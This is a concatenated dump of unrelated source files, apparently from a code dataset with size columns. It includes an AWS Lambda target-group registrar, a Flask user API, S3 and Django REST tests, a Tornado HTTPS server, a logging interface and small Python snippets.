assert all(row in collected_from_s3 for row in collected_original)
| 6,090 | 2,140 |
import os
import json
import boto3
# create the boto3 clients
ec2 = boto3.client('ec2')
elbv2 = boto3.client('elbv2')
# Get the ALB Target Group ARNs
MLFLOW_TARGET_GROUP_ARN=os.getenv('MLFLOW_TARGET_GROUP_ARN')
TENSORBOARD_TARGET_GROUP_ARN=os.getenv('TENSORBOARD_TARGET_GROUP_ARN')
RAY_DASHBOARD_TARGET_GROUP_ARN=os.getenv('RAY_DASHBOARD_TARGET_GROUP_ARN')
JUPYTER_TARGET_GROUP_ARN=os.getenv('JUPYTER_TARGET_GROUP_ARN')
PROMETHEUS_TARGET_GROUP_ARN=os.getenv('PROMETHEUS_TARGET_GROUP_ARN')
GRAFANA_TARGET_GROUP_ARN=os.getenv('GRAFANA_TARGET_GROUP_ARN')
print(f'MLFLOW_TARGET_GROUP_ARN={MLFLOW_TARGET_GROUP_ARN}')
print(f'TENSORBOARD_TARGET_GROUP_ARN={TENSORBOARD_TARGET_GROUP_ARN}')
print(f'RAY_DASHBOARD_TARGET_GROUP_ARN={RAY_DASHBOARD_TARGET_GROUP_ARN}')
print(f'JUPYTER_TARGET_GROUP_ARN={JUPYTER_TARGET_GROUP_ARN}')
print(f'PROMETHEUS_TARGET_GROUP_ARN={PROMETHEUS_TARGET_GROUP_ARN}')
print(f'GRAFANA_TARGET_GROUP_ARN={GRAFANA_TARGET_GROUP_ARN}')
# the target group ARN to port mappping
target_group_port_mappings = [
{
"target_group": MLFLOW_TARGET_GROUP_ARN,
"port": 5000
},
{
"target_group": TENSORBOARD_TARGET_GROUP_ARN,
"port": 6006
},
{
"target_group": RAY_DASHBOARD_TARGET_GROUP_ARN,
"port": 8265
},
{
"target_group": JUPYTER_TARGET_GROUP_ARN,
"port": 8888
},
{
"target_group": PROMETHEUS_TARGET_GROUP_ARN,
"port": 9090
},
{
"target_group": GRAFANA_TARGET_GROUP_ARN,
"port": 3000
}
]
def deregister_targets(instance_id):
for target_port_map in target_group_port_mappings:
deregister_target(target_port_map['target_group'], instance_id, target_port_map['port'])
def register_targets(instance_id):
for target_port_map in target_group_port_mappings:
register_target(target_port_map['target_group'], instance_id, target_port_map['port'])
def deregister_target(target_group, instance_id, port):
print(f"Deregistering instance id={instance_id} and port={port} with target group={target_group}")
response = elbv2.deregister_targets(TargetGroupArn=target_group, Targets=[ {"Id": instance_id, "Port": port }])
print(json.dumps(response))
def register_target(target_group, instance_id, port):
print(f"Registering instance id={instance_id} and port={port} with target group={target_group}")
response = elbv2.register_targets(TargetGroupArn=target_group, Targets=[ {"Id": instance_id, "Port": port }])
print(json.dumps(response))
def is_ray_head_node(tags):
for tag in tags:
if tag["Key"] == 'Name' and tag["Value"].startswith("ray-") and tag["Value"].endswith("-head"):
print(f'Tag value is {tag["Value"]}')
return True
return False
def lambda_handler(event, context):
print(json.dumps(event))
instance_id = event["detail"]["instance-id"]
print(f'Instance ID: {instance_id}')
# get the instance state from the message
if event["detail"]["state"] in [ 'running', 'terminated', 'stopped' ]:
print("Getting instance details")
response = ec2.describe_instances(InstanceIds=[instance_id])
print(response)
if response and len(response['Reservations']) > 0:
instance_details = response['Reservations'][0]['Instances'][0]
print("Instance details:")
print(instance_details)
instance_tags = instance_details['Tags']
if is_ray_head_node(instance_tags):
print("Processing head node")
if event["detail"]["state"] == 'running':
register_targets(instance_id)
else:
deregister_targets(instance_id)
else:
print("Instance is not Ray head not so ignoring")
else:
print(f"Instance id: {instance_id} not found")
else:
print(f'Ignoring event {event["detail"]["state"]}')
| 3,962 | 1,429 |
from flask import Flask, request, jsonify, make_response
from flask_sqlalchemy import SQLAlchemy
from marshmallow import fields
from marshmallow_sqlalchemy import ModelSchema
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://username:password@host:port/database-name'
db = SQLAlchemy(app)
# Model
class User(db.Model):
__tablename__ = "users"
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(20))
def create(self):
db.session.add(self)
db.session.commit()
return self
def __init__(self, username):
self.username = username
def __repr__(self):
return f"{self.id}"
db.create_all()
class UserSchema(ModelSchema):
class Meta(ModelSchema.Meta):
model = User
sqla_session = db.session
id = fields.Number(dump_only=True)
username = fields.String(required=True)
@app.route('/api/v1/username', methods=['GET'])
def index():
get_users = User.query.all()
user_schema = UserSchema(many=True)
users = user_schema.dump(get_users)
return make_response(jsonify({"list users ": users}))
@app.route('/api/v1/username/<id>', methods=['GET'])
def get_user_by_id(id):
get_user = User.query.get(id)
user_schema = UserSchema()
user = user_schema.dump(get_user)
return make_response(jsonify({"user ": user}))
@app.route('/api/v1/username/<id>', methods=['PUT'])
def update_user_by_id(id):
data = request.get_json()
get_user = User.query.get(id)
if data.get('username'):
get_user.username = data['username']
db.session.add(get_user)
db.session.commit()
user_schema = UserSchema(only=['id', 'username'])
user = user_schema.dump(get_user)
return make_response(jsonify({"user ": user}))
@app.route('/api/v1/username/<id>', methods=['DELETE'])
def delete_user_by_id(id):
get_user = User.query.get(id)
db.session.delete(get_user)
db.session.commit()
return make_response("", 204)
@app.route('/api/v1/username', methods=['POST'])
def create_todo():
data = request.get_json()
user_schema = UserSchema()
user = user_schema.load(data)
result = user_schema.dump(user.create())
return make_response(jsonify({"user ": result}), 200)
if __name__ == "__main__":
app.run(debug=True) | 2,325 | 816 |
from model_utils import Choices
RELATIONS = Choices(
(0, 'eq', '='),
(1, 'ne', '!='),
(2, 'gt', '>'),
(3, 'lt', '<'),
(4, 'ge', '>='),
(5, 'le', '<='),
)
STATUSES = Choices(
('NEW', 'New'),
('RUNNING', 'Running'),
('FINISHED', 'Finished'),
('ERROR', 'Error')
)
RESULTS = Choices(
('SUCCESS', 'Success'),
('WARNING', 'Warning'),
('FAILED', 'Failed')
)
CHECK_TYPES = Choices(
(0, 'SQL_QUERY', 'SQL query'),
(1, 'SQL_EXPRESSION', 'SQL expression'),
(2, 'NUMBER', 'Number'),
(3, 'STRING', 'String'),
(4, 'DATE', 'Date'),
(5, 'PYTHON_EXPRESSION', 'Python expression'),
)
| 647 | 275 |
# Product versions live here (and only here). They should be bumped at every
# release.
#
# NOTE: This is parsable by both bazel and sh. Do not add arbitrary
# text here.
#
# Versions *must* adhere to semantic versioning rules. See http://semver.org/
#
# Don't forget to also update relevant docs and README.txt files. ;)
# This is the public-facing program release version of biograph and the SDK
BIOGRAPH_VERSION="7.1.2-dev"
# Use this version of the ML model from archive.spiralgenetics.com.
BIOGRAPH_MODEL_VERSION="7.1.0"
# SEQSET is the biograph file format version
SEQSET_VERSION="2.0.0"
# SpEC file format + program version
SPEC_VERSION="1.3.2-dev"
| 661 | 226 |
from typing import List
class Solution:
def searchInsert(self, a: List[int], target: int) -> int:
l, r = 0, len(a)-1
#binary search
while l<=r:
mid = (l+r)//2
if target == a[mid]:
return mid
elif target > a[mid]:
l = mid+1
elif target < a[mid]:
r = mid-1
#if not found
if target < a[mid]:
return mid
elif target > a[mid]:
return mid+1
| 523 | 153 |
name=input("hi, what's your name?")
age=input("how old are you?")
print("your name is ", name, "and you are ", age )
# int(x) = change string to integer
# str(x)= change integer to string
# to check type, print(type"x")
# you can only print "results" of the same type, unless doing string interpolation.
# difference between string interpolation and comma is that the variable cannot be placed in the middle
number=1
name="grace"
#assigning string "grace" into variable "name"
result=str(number)+" "+name
print(result)
print(number,name)
| 542 | 162 |
from pyspark.mllib.feature import HashingTF, IDF
from pyspark.mllib.regression import LabeledPoint
from pyspark.mllib.classification import NaiveBayes
import os.path
os.environ["SPARK_HOME"] = "/usr/local/spark"
os.environ["PYSPARK_PYTHON"]="/System/Library/Frameworks/Python.framework/Versions/2.7/bin/python2.7"
from pyspark import SparkContext
def parseLine(line):
dataset = []
parts = line.split(',')
labels = float(parts[0])
features = parts[1]
dataset.append({"label":labels,"text":features})
return dataset
# Read the data and parse it into a list
sc = SparkContext("local[4]","NaiveBayesClassifier")
data = sc.textFile("training_test_data.txt").map(parseLine)
'''
Split data into labels and features, transform
preservesPartitioning is not really required
since map without partitioner shouldn't trigger repartitiong
'''
# Extract all the "labels"
labels = data.map(lambda doc: doc[0]["label"], preservesPartitioning = True)
for x in labels.take(3):
print x
# Perform TF-IDF
tf = HashingTF().transform(data.map(lambda doc: doc[0]["text"], preservesPartitioning=True))
idf = IDF().fit(tf)
tfidf = idf.transform(tf)
# Combine lables and tfidf and create LabeledPoint data
dataset = labels.zip(tfidf).map(lambda x: LabeledPoint(x[0], x[1]))
for x in dataset.take(3):
print(x)
result=[]
'''
Random split dataset - 60% as training data and 40% as testing.
Train and test the model 10 times. Then put the accuracy into result[]
'''
for i in range(0,10):
training, test = dataset.randomSplit([0.6,0.4],seed=i)
model = NaiveBayes.train(training,1.0)
predictionAndLabel = test.map(lambda p: (model.predict(p.features), p.label))
accuracy = 1.0 * predictionAndLabel.filter(lambda (x, v): x == v).count() / test.count()
result.append(accuracy)
print(accuracy)
print(result)
# Save the model
model.save(sc,"mynewmodel") | 1,877 | 639 |
import tempfile
from pathlib import Path
import boto3
from moto import mock_s3
from minato.filesystems import S3FileSystem
@mock_s3
def test_open_file() -> None:
url = "s3://my_bucket/path/to/file"
conn = boto3.resource("s3", region_name="us-east-1")
conn.create_bucket(Bucket="my_bucket")
fs = S3FileSystem(url)
with fs.open_file("w") as fp:
fp.write("Hello, world!")
with fs.open_file("r") as fp:
text = fp.read()
assert text == "Hello, world!"
@mock_s3
def test_download_file() -> None:
url = "s3://my_bucket/path/to/file"
conn = boto3.resource("s3", region_name="us-east-1")
conn.create_bucket(Bucket="my_bucket")
with S3FileSystem("s3://my_bucket/path/to/file").open_file("w") as fp:
fp.write("file")
with tempfile.TemporaryDirectory() as _tempdir:
tempdir = Path(_tempdir)
fs = S3FileSystem(url)
fs.download(tempdir)
assert (tempdir / "file").is_file()
@mock_s3
def test_download_dir_with_trailing_slash() -> None:
url = "s3://my_bucket/path/to/dir/"
conn = boto3.resource("s3", region_name="us-east-1")
conn.create_bucket(Bucket="my_bucket")
with S3FileSystem("s3://my_bucket/path/to/dir/foo.txt").open_file("w") as fp:
fp.write("foo")
with S3FileSystem("s3://my_bucket/path/to/dir/bar/bar.txt").open_file("w") as fp:
fp.write("bar")
with tempfile.TemporaryDirectory() as _tempdir:
tempdir = Path(_tempdir)
fs = S3FileSystem(url)
fs.download(tempdir)
assert (tempdir / "foo.txt").is_file()
assert (tempdir / "bar").is_dir()
assert (tempdir / "bar" / "bar.txt").is_file()
@mock_s3
def test_download_dir_without_trailing_slash() -> None:
url = "s3://my_bucket/path/to/dir"
conn = boto3.resource("s3", region_name="us-east-1")
conn.create_bucket(Bucket="my_bucket")
with S3FileSystem("s3://my_bucket/path/to/dir/foo.txt").open_file("w") as fp:
fp.write("foo")
with S3FileSystem("s3://my_bucket/path/to/dir/bar/bar.txt").open_file("w") as fp:
fp.write("bar")
with tempfile.TemporaryDirectory() as _tempdir:
tempdir = Path(_tempdir)
fs = S3FileSystem(url)
fs.download(tempdir)
assert (tempdir / "dir" / "foo.txt").is_file()
assert (tempdir / "dir" / "bar").is_dir()
assert (tempdir / "dir" / "bar" / "bar.txt").is_file()
@mock_s3
def test_exists() -> None:
conn = boto3.resource("s3", region_name="us-east-1")
conn.create_bucket(Bucket="my_bucket")
with S3FileSystem("s3://my_bucket/path/to/dir/foo.txt").open_file("w") as fp:
fp.write("foo")
assert S3FileSystem("s3://my_bucket/path/to/dir").exists()
assert S3FileSystem("s3://my_bucket/path/to/dir/foo.txt").exists()
assert not S3FileSystem("s3://my_bucket/path/to/dir/bar.txt").exists()
@mock_s3
def test_delete() -> None:
conn = boto3.resource("s3", region_name="us-east-1")
conn.create_bucket(Bucket="my_bucket")
with S3FileSystem("s3://my_bucket/path/to/dir/foo.txt").open_file("w") as fp:
fp.write("foo")
fs = S3FileSystem("s3://my_bucket/path/to/dir")
assert fs.exists()
fs.delete()
assert not fs.exists()
@mock_s3
def test_get_version() -> None:
conn = boto3.resource("s3", region_name="us-east-1")
conn.create_bucket(Bucket="my_bucket")
with S3FileSystem("s3://my_bucket//dir/foo.txt").open_file("w") as fp:
fp.write("foo")
with S3FileSystem("s3://my_bucket//dir/bar.txt").open_file("w") as fp:
fp.write("bar")
fs = S3FileSystem("s3://my_bucket//dir")
version = fs.get_version()
assert version is not None
assert len(version.split(".")) == 2
@mock_s3
def test_update_version() -> None:
conn = boto3.resource("s3", region_name="us-east-1")
conn.create_bucket(Bucket="my_bucket")
fs = S3FileSystem("s3://my_bucket//dir/foo.txt")
with fs.open_file("w") as fp:
fp.write("hello")
old_version = fs.get_version()
assert old_version is not None
current_version = fs.get_version()
assert current_version is not None
assert current_version == old_version
with fs.open_file("w") as fp:
fp.write("world")
new_version = fs.get_version()
assert new_version is not None
assert old_version != new_version
@mock_s3
def test_upload_file(tmpdir: Path) -> None:
conn = boto3.resource("s3", region_name="us-east-1")
conn.create_bucket(Bucket="my_bucket")
filename = tmpdir / "foo.txt"
with open(filename, "w") as localfile:
localfile.write("this is foo!")
fs = S3FileSystem("s3://my_bucket/dir/foo.txt")
assert not fs.exists()
fs.upload(filename)
assert fs.exists()
with fs.open_file("r") as remotefile:
content = remotefile.read()
assert content == "this is foo!"
@mock_s3
def test_upload_file_to_dir(tmpdir: Path) -> None:
conn = boto3.resource("s3", region_name="us-east-1")
conn.create_bucket(Bucket="my_bucket")
filename = tmpdir / "foo.txt"
with open(filename, "w") as localfile:
localfile.write("this is foo!")
dirfs = S3FileSystem("s3://my_bucket/dir/")
assert not dirfs.exists()
dirfs.upload(filename)
filefs = S3FileSystem("s3://my_bucket/dir/foo.txt")
assert filefs.exists()
with filefs.open_file("r") as remotefile:
content = remotefile.read()
assert content == "this is foo!"
@mock_s3
def test_upload_dir(tmpdir: Path) -> None:
workdir = tmpdir / "work"
workdir.mkdir()
conn = boto3.resource("s3", region_name="us-east-1")
conn.create_bucket(Bucket="my_bucket")
with open(workdir / "foo.txt", "w") as localfile:
localfile.write("this is foo!")
with open(workdir / "bar.txt", "w") as localfile:
localfile.write("this is bar!")
dirfs = S3FileSystem("s3://my_bucket/dir")
assert not dirfs.exists()
dirfs.upload(workdir)
foofs = S3FileSystem("s3://my_bucket/dir/foo.txt")
barfs = S3FileSystem("s3://my_bucket/dir/bar.txt")
assert foofs.exists()
assert barfs.exists()
with foofs.open_file("r") as remotefile:
content = remotefile.read()
assert content == "this is foo!"
with barfs.open_file("r") as remotefile:
content = remotefile.read()
assert content == "this is bar!"
@mock_s3
def test_upload_dir_to_dir(tmpdir: Path) -> None:
workdir = tmpdir / "work"
workdir.mkdir()
conn = boto3.resource("s3", region_name="us-east-1")
conn.create_bucket(Bucket="my_bucket")
with open(workdir / "foo.txt", "w") as localfile:
localfile.write("this is foo!")
with open(workdir / "bar.txt", "w") as localfile:
localfile.write("this is bar!")
dirfs = S3FileSystem("s3://my_bucket/dir/")
assert not dirfs.exists()
dirfs.upload(workdir)
foofs = S3FileSystem("s3://my_bucket/dir/work/foo.txt")
barfs = S3FileSystem("s3://my_bucket/dir/work/bar.txt")
assert foofs.exists()
assert barfs.exists()
with foofs.open_file("r") as remotefile:
content = remotefile.read()
assert content == "this is foo!"
with barfs.open_file("r") as remotefile:
content = remotefile.read()
assert content == "this is bar!"
| 7,298 | 2,727 |
from django.test import TestCase
from django.urls import reverse
from django.utils import timezone
from django.contrib.auth import get_user_model
from rest_framework.test import APIClient
from rest_framework import status
from core.models import Category, School, Session, Subject, Level, Lesson, \
Moderation
from school.serializers import SessionSerializer, ModerationSerializer, \
UserSerializer
reg_url = '/api/v1/accounts/auth/registration/'
class TestPrivateModerationApi(TestCase):
def setUp(self):
self.client = APIClient()
self.client = APIClient()
payload = {
"email": "testuser@bondeveloper.com",
"password": "Qwerty!@#",
"password1": "Qwerty!@#",
"password2": "Qwerty!@#",
"username": "testuser01"
}
auth_user = self.client.post(reg_url, payload, format='json')
access_token = auth_user.data.get('access_token')
self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + access_token)
def test_authentication_required(self):
self.client = APIClient()
res = self.client.get(reverse('school:moderation-list'))
self.assertEquals(res.status_code, status.HTTP_401_UNAUTHORIZED)
def test_moderation_create_successful(self):
learner = get_user_model().objects.create(
username="learner01",
email="learner@bondeveloper.coom",
password="Qwerty!@#",
)
learner2 = get_user_model().objects.create(
username="learner02",
email="learner02@bondeveloper.coom",
password="Qwerty!@#",
)
instructor = get_user_model().objects.create(
username="instructor",
email="instructor@bondeveloper.coom",
password="Qwerty!@#",
)
cat = Category.objects.create(
basename="sample1",
name="Sample Category"
)
sch = School.objects.create(
basename="gruut-high",
name="Gruut High",
category=cat,
)
sub = Subject.objects.create(
basename="spanish-fal",
name="Spanish FAL",
school=sch
)
level = Level.objects.create(
basename="grade-9",
name="Grade 9",
school=sch
)
les = Lesson.objects.create(
subject=sub,
level=level,
instructor=instructor,
name="Python 101"
)
les.learners.add(learner, learner2)
ses = Session.objects.create(
start_time=timezone.now(),
type="TCN",
end_time=timezone.now(),
lesson=les
)
payload = {
"session": SessionSerializer(ses).data.get('id'),
"learner": UserSerializer(learner).data.get('id'),
"learner_score": 45,
"max_score": 100,
"score_type": "unit",
}
res = self.client.post(reverse("school:moderation-create"),
payload, format='json'
)
self.assertEquals(res.status_code, status.HTTP_201_CREATED)
self.assertEquals(res.data.get('learner_score'), 45)
def test_moderation_update_api(self):
learner = get_user_model().objects.create(
username="learner01",
email="learner@bondeveloper.coom",
password="Qwerty!@#",
)
learner2 = get_user_model().objects.create(
username="learner02",
email="learner02@bondeveloper.coom",
password="Qwerty!@#",
)
instructor = get_user_model().objects.create(
username="instructor",
email="instructor@bondeveloper.coom",
password="Qwerty!@#",
)
cat = Category.objects.create(
basename="sample1",
name="Sample Category"
)
sch = School.objects.create(
basename="gruut-high",
name="Gruut High",
category=cat,
)
sub = Subject.objects.create(
basename="spanish-fal",
name="Spanish FAL",
school=sch
)
level = Level.objects.create(
basename="grade-9",
name="Grade 9",
school=sch
)
les = Lesson.objects.create(
subject=sub,
level=level,
instructor=instructor,
name="Python 101"
)
les.learners.add(learner, learner2)
ses = Session.objects.create(
start_time=timezone.now(),
type="TCN",
end_time=timezone.now(),
lesson=les
)
mod = Moderation.objects.create(
session=ses,
learner=learner,
learner_score=20,
max_score=100,
score_type="unit"
)
res = self.client.patch(reverse(
"school:moderation-update",
args=[mod.id]
),
ModerationSerializer(mod).data,
format='json'
)
self.assertEquals(res.status_code, status.HTTP_200_OK)
self.assertEquals(res.data.get('score_type'), 'unit')
def test_moderation_list_successful(self):
learner = get_user_model().objects.create(
username="learner01",
email="learner@bondeveloper.coom",
password="Qwerty!@#",
)
learner2 = get_user_model().objects.create(
username="learner02",
email="learner02@bondeveloper.coom",
password="Qwerty!@#",
)
instructor = get_user_model().objects.create(
username="instructor",
email="instructor@bondeveloper.coom",
password="Qwerty!@#",
)
cat = Category.objects.create(
basename="sample1",
name="Sample Category"
)
sch = School.objects.create(
basename="gruut-high",
name="Gruut High",
category=cat,
)
sub = Subject.objects.create(
basename="spanish-fal",
name="Spanish FAL",
school=sch
)
level = Level.objects.create(
basename="grade-9",
name="Grade 9",
school=sch
)
les = Lesson.objects.create(
subject=sub,
level=level,
instructor=instructor,
name="Python 101"
)
les.learners.add(learner, learner2)
ses = Session.objects.create(
start_time=timezone.now(),
type="TCN",
end_time=timezone.now(),
lesson=les
)
Moderation.objects.create(
session=ses,
learner=learner,
learner_score=20,
max_score=100,
score_type="unit"
)
Moderation.objects.create(
session=ses,
learner=learner,
learner_score=40,
max_score=100,
score_type="percentage"
)
res = self.client.get(reverse('school:moderation-list'))
self.assertEquals(res.status_code, status.HTTP_200_OK)
self.assertEquals(len(res.data), 2)
def test_moderation_delete_successful(self):
learner = get_user_model().objects.create(
username="learner01",
email="learner@bondeveloper.coom",
password="Qwerty!@#",
)
learner2 = get_user_model().objects.create(
username="learner02",
email="learner02@bondeveloper.coom",
password="Qwerty!@#",
)
instructor = get_user_model().objects.create(
username="instructor",
email="instructor@bondeveloper.coom",
password="Qwerty!@#",
)
cat = Category.objects.create(
basename="sample1",
name="Sample Category"
)
sch = School.objects.create(
basename="gruut-high",
name="Gruut High",
category=cat,
)
sub = Subject.objects.create(
basename="spanish-fal",
name="Spanish FAL",
school=sch
)
level = Level.objects.create(
basename="grade-9",
name="Grade 9",
school=sch
)
les = Lesson.objects.create(
subject=sub,
level=level,
instructor=instructor,
name="Python 101"
)
les.learners.add(learner, learner2)
ses = Session.objects.create(
start_time=timezone.now(),
type="TCN",
end_time=timezone.now(),
lesson=les
)
mod1 = Moderation.objects.create(
session=ses,
learner=learner,
learner_score=20,
max_score=100,
score_type="unit"
)
Moderation.objects.create(
session=ses,
learner=learner,
learner_score=40,
max_score=100,
score_type="percentage"
)
mod = Moderation.objects.all()
ser = ModerationSerializer(mod, many=True)
self.assertEquals(len(ser.data), 2)
res = self.client.delete(reverse(
'school:moderation-delete',
args=[mod1.id]
),
ser.data, format='json'
)
self.assertEquals(res.status_code, status.HTTP_204_NO_CONTENT)
mod = Moderation.objects.all()
ser = ModerationSerializer(mod, many=True)
self.assertEquals(len(ser.data), 1)
def test_moderation_retrieve_successful(self):
learner = get_user_model().objects.create(
username="learner01",
email="learner@bondeveloper.coom",
password="Qwerty!@#",
)
learner2 = get_user_model().objects.create(
username="learner02",
email="learner02@bondeveloper.coom",
password="Qwerty!@#",
)
instructor = get_user_model().objects.create(
username="instructor",
email="instructor@bondeveloper.coom",
password="Qwerty!@#",
)
cat = Category.objects.create(
basename="sample1",
name="Sample Category"
)
sch = School.objects.create(
basename="gruut-high",
name="Gruut High",
category=cat,
)
sub = Subject.objects.create(
basename="spanish-fal",
name="Spanish FAL",
school=sch
)
level = Level.objects.create(
basename="grade-9",
name="Grade 9",
school=sch
)
les = Lesson.objects.create(
subject=sub,
level=level,
instructor=instructor,
name="Python 101"
)
les.learners.add(learner, learner2)
ses = Session.objects.create(
start_time=timezone.now(),
type="TCN",
end_time=timezone.now(),
lesson=les
)
mod1 = Moderation.objects.create(
session=ses,
learner=learner,
learner_score=20,
max_score=100,
score_type="unit"
)
Moderation.objects.create(
session=ses,
learner=learner,
learner_score=40,
max_score=100,
score_type="percentage"
)
res = self.client.get(reverse("school:moderation-view",
args=[mod1.id]
)
)
self.assertEquals(res.status_code, status.HTTP_200_OK)
self.assertEquals(res.data.get('score_type'), 'unit')
| 12,269 | 3,516 |
from .create_invite import CreateInviteController
from ..usecases import create_invite_usecase
create_invite_controller = CreateInviteController(create_invite_usecase)
| 169 | 48 |
import traceback, logging, signal, time, ssl
from functools import partial
from tornado import httpserver, ioloop, log
from tornado.web import Application
import settings, isetools, isehandlers, ruckushandlers
PORT = 2443
def create_server(serverlist, username, password, emailer=None, certfile=None,
keyfile=None):
"""Create a Tornado server/app object.
"""
isetools_obj = isetools.ISETools(serverlist, username, password, emailer)
isehandlers.assign_objects(isetools_obj)
handlers = isehandlers.handlers + ruckushandlers.handlers
app = Application(handlers, debug=True)
if certfile and keyfile:
# Enable HTTPS if certificates are available
ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_ctx.load_cert_chain(certfile, keyfile)
return httpserver.HTTPServer(app, ssl_options=ssl_ctx)
else:
# Otherwise set up for a front-end proxy (like nginx)
return httpserver.HTTPServer(app, xheaders=True)
def signal_handler(server, sig, frame):
"""Handle shutdown signals (like SIGTERM) to shut off the web server
gracefully.
"""
io_loop = ioloop.IOLoop.current()
def stop_loop(deadline):
if (time.time() < deadline and
(io_loop._callbacks or io_loop._timeouts)): #pylint: disable=no-member
io_loop.add_timeout(time.time() + 1, stop_loop, deadline)
else:
io_loop.stop()
def shutdown():
logging.info('Signal received, stopping web server')
server.stop()
# wait 2 seconds after receiving SIGINT to complete requests
stop_loop(time.time() + 2)
io_loop.add_callback_from_signal(shutdown)
if __name__ == "__main__":
if not hasattr(settings, 'ISE_SERVERLIST'):
raise ValueError("settings.py missing ISE_SERVERLIST (list of IP/FQDN strings)")
elif not hasattr(settings, 'ISE_USERNAME'):
raise ValueError("settings.py missing ISE_USERNAME (string)")
elif not hasattr(settings, 'ISE_PASSWORD'):
raise ValueError("settings.py missing ISE_PASSWORD (string)")
elif not hasattr(settings, 'CERTFILE'):
raise ValueError("settings.py missing CERTFILE (HTTPS certificate .cer filename)")
elif not hasattr(settings, 'KEYFILE'):
raise ValueError("settings.py missing KEYFILE (HTTPS private key .key filesname)")
log.enable_pretty_logging() # set up Tornado-formatted loggging
logging.root.handlers[0].setFormatter(log.LogFormatter())
server = create_server(settings.ISE_SERVERLIST, settings.ISE_USERNAME,
settings.ISE_PASSWORD, certfile=settings.CERTFILE,
keyfile=settings.KEYFILE)
signal.signal(signal.SIGTERM, partial(signal_handler, server))
signal.signal(signal.SIGINT, partial(signal_handler, server))
logging.info("Starting...")
server.listen(PORT)
ioloop.IOLoop.current().start()
logging.info("Stopping...")
| 2,937 | 904 |
#!/usr/bin/env python3
# -*- encoding=utf-8 -*-
# description:
# author:jack
# create_time: 2019-07-04
from dueros.directive.BaseDirective import BaseDirective
class Buy(BaseDirective):
"""
用于生成Buy指令的类
"""
def __init__(self, product_id, token=''):
super(Buy, self).__init__('Connections.SendRequest.Buy')
if token:
self.data['token'] = token
self.data['payload']['productId'] = product_id
| 446 | 163 |
__all__ = ('Actions', 'LoggerInterface', 'RunCallback', 'FileCallback', 'Logger', 'DummyLoggerInterface')
#
# Interface: group of loggers which can attach multiple loggers.
#
class Actions(object):
Run = 'run'
Open = 'open'
Fork = 'fork'
class LoggerInterface(object):
"""
Base class for logging interaction on hosts.
(Not threadsafe)
"""
def __init__(self):
self.loggers = []
def attach(self, logger):
"""
Attach logger to logging interface.
"""
self.loggers.append(logger)
def detach(self, logger):
"""
Remove logger from logging interface.
"""
self.loggers.remove(logger)
def attach_in_block(self, logger):
class LoggerAttachment(object):
def __enter__(context):
self.attach(logger)
def __exit__(context, *a):
self.detach(logger)
return LoggerAttachment()
def group(self, func_name, *args, **kwargs):
class LogGroup(object):
def __enter__(context):
context.loggers = self.loggers[:]
for l in context.loggers:
l.enter_group(func_name, *args, **kwargs)
def __exit__(context, *a):
for l in context.loggers:
l.leave_group()
return LogGroup()
def log_fork(self, fork_name):
class Fork(object):
entry_type = Actions.Fork
def __init__(entry):
entry.fork_name = fork_name
entry._callbacks = [ l.log_fork(entry) for l in self.loggers ]
entry.succeeded = None
entry.exception = None
def set_succeeded(entry):
entry.succeeded = True
for c in entry._callbacks:
c.completed()
def set_failed(entry, exception):
entry.succeeded = False
entry.exception = exception
for c in entry._callbacks:
c.completed()
def get_logger_interface(entry):
"""
Return a new logger interface object, which will be used
in this fork (thread).
"""
interface = LoggerInterface()
for c in entry._callbacks:
interface.attach(c.get_fork_logger())
return interface
return Fork()
def log_run(self, *a, **kwargs):
"""
Log SSH commands.
"""
class Run(object):
entry_type = Actions.Run
def __init__(entry, host=None, command=None, use_sudo=False, sandboxing=False, interactive=False, shell=False):
entry.host = host
entry.command = command
entry.use_sudo = use_sudo
entry.sandboxing = sandboxing
entry.interactive = interactive
entry.shell = shell
entry.status_code = 'unknown'
entry._callbacks = []
entry._io = []
def set_status_code(entry, status_code):
entry.status_code = status_code
@property
def succeeded(entry):
return entry.status_code == 0
@property
def io(entry):
return ''.join(entry._io)
def __enter__(entry):
entry._callbacks = [ l.log_run(entry) for l in self.loggers ]
return entry
def __exit__(entry, *a):
for c in entry._callbacks:
c.completed()
return Run(*a, **kwargs)
def log_file(self, host, **kwargs):
"""
Log a get/put/open actions on remote files.
"""
class File(object):
entry_type = Actions.Open
def __init__(entry, host, mode=None, remote_path=None, local_path=None, use_sudo=False, sandboxing=False):
entry.host = host
entry.remote_path = remote_path
entry.local_path = local_path
entry.mode = mode # Required for 'open()' action.
entry.use_sudo = use_sudo
entry.sandboxing = sandboxing
entry.succeeded = None # Unknown yet
def complete(entry, succeeded=True):
entry.succeeded = succeeded
def __enter__(entry):
entry._callbacks = [ l.log_file_opened(entry) for l in self.loggers ]
return entry
def __exit__(entry, *a):
for c in entry._callbacks:
c.file_closed()
return File(host, **kwargs)
def log_exception(self, e):
for l in self.loggers:
l.log_exception(e)
def log_msg(self, msg):
for l in self.loggers:
l.log_msg(msg)
class DummyLoggerInterface(LoggerInterface):
"""
Dummy logger, does nothing
"""
pass
#
# Base logger
#
class Logger(object):
#
# Following methods are to be overriden by specific loggers.
#
def enter_group(self, func_name, *args, **kwargs):
pass
def leave_group(self):
pass
def log_fork(self, fork_name):
return ForkCallback()
def log_run(self, run_entry):
return RunCallback()
def log_file_opened(self, file_entry):
return FileCallback()
def log_exception(self, e):
pass
def log_msg(self, msg):
pass
#
# Callbacks
#
class RunCallback(object):
def __init__(self, completed=None):
if completed:
self.completed = completed
def completed(self):
pass
class FileCallback(object):
def __init__(self, file_closed=None):
if file_closed:
self.file_closed = file_closed
def file_closed(self):
pass
class ForkCallback(object):
def completed(self):
pass
def get_fork_logger(self):
# Return Dummy logger
return Logger()
| 6,064 | 1,656 |
import numpy as np
def generate_binary_distribution(batchsize, dim):
z_batch = np.zeros((batchsize, dim))
for b in range(batchsize):
value_zeros_ones = np.zeros((dim))
for i in range(dim):
if i < dim // 2:
value_zeros_ones[i] = 0.
else:
value_zeros_ones[i] = 1.
index = np.arange(dim)
np.random.shuffle(index)
z_batch[b, ...] = value_zeros_ones[index]
return z_batch
| 477 | 164 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
